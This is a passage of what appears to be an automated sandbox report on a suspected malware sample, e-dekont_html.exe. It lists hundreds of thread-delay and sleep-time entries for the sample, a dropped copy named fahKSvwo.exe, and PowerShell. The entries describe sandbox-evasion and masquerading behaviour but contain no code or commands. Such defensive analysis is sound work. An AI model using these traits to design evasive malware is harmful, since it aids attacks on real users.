                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599890
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599781
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599668
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599562
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599453
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599344
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599234
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599124
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599015
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598897
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598781
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598660
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598516
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598406
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598292
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598187
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598078
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597969
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597844
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597665
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597494
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597344
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597234
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597125
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597016
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596891
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596766
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596656
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596547
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596437
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596328
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596219
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596109
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596000
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595891
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595766
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595641
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595531
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595422
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595313
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595188
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595063
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594930
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594652
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594540
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594422
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594312
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594203
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594094
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 593983
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 593875
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 593766
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599875
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599766
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599654
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599545
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599219
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599094
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598984
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598875
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598765
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598656
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598546
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598402
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598183
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598078
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597953
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597844
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597731
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597582
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597453
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597344
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597233
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597125
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597016
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596906
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596797
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596688
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596563
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596453
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596344
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596219
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595326
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595206
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594746
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594641
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594516
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594406
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594297
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594187
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594078
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 593969
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 593839
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7347
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2269
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6693
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2858
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Window / User API: threadDelayed 4133
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Window / User API: threadDelayed 5695
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Window / User API: threadDelayed 4271
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Window / User API: threadDelayed 5574
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 6036 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7328 | Thread sleep time: -13835058055282155s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7344 | Thread sleep time: -14757395258967632s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep count: 38 > 30
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -35048813740048126s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7520 | Thread sleep count: 4133 > 30
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -599890s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -599781s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -599668s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7520 | Thread sleep count: 5695 > 30
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -599562s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -599453s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -599344s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -599234s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -599124s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -599015s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -598897s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -598781s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -598660s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -598516s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -598406s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -598292s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -598187s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -598078s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -597969s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -597844s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -597665s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -597494s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -597344s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -597234s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -597125s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -597016s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -596891s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -596766s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -596656s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -596547s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -596437s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -596328s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -596219s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -596109s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -596000s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -595891s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -595766s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -595641s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -595531s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -595422s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -595313s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -595188s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -595063s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -594930s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -594652s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -594540s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -594422s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -594312s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -594203s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -594094s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -593983s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -593875s >= -30000s
                Source: C:\Users\user\Desktop\e-dekont_html.exe TID: 7516 | Thread sleep time: -593766s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7464 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep count: 38 > 30
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -35048813740048126s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7796 | Thread sleep count: 4271 > 30
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -599875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7796 | Thread sleep count: 5574 > 30
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -599766s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -599654s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -599545s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -599437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -599328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -599219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -599094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -598984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -598875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -598765s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -598656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -598546s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -598402s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -598183s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -598078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -597953s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -597844s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -597731s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -597582s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -597453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -597344s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -597233s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -597125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -597016s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -596906s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -596797s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -596688s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -596563s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -596453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -596344s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -596219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -596110s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -595985s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -595860s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -595735s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -595610s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -595485s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -595326s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -595206s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -594746s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -594641s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -594516s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -594406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -594297s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -594187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -594078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -593969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792 | Thread sleep time: -593839s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599890
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599781
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599668
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599562
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599453
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599344
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599234
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599124
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 599015
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598897
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598781
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598660
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598516
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598406
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598292
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598187
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 598078
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597969
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597844
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597665
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597494
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597344
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597234
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597125
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 597016
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596891
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596766
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596656
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596547
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596437
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596328
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596219
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596109
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596000
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595891
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595766
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595641
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595531
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595422
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595313
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595188
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 595063
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594930
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594652
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594540
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594422
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594312
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594203
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 594094
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 593983
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 593875
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 593766
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599875
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599766
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599654
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599545
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599219
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599094
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598984
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598875
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598765
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598656
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598546
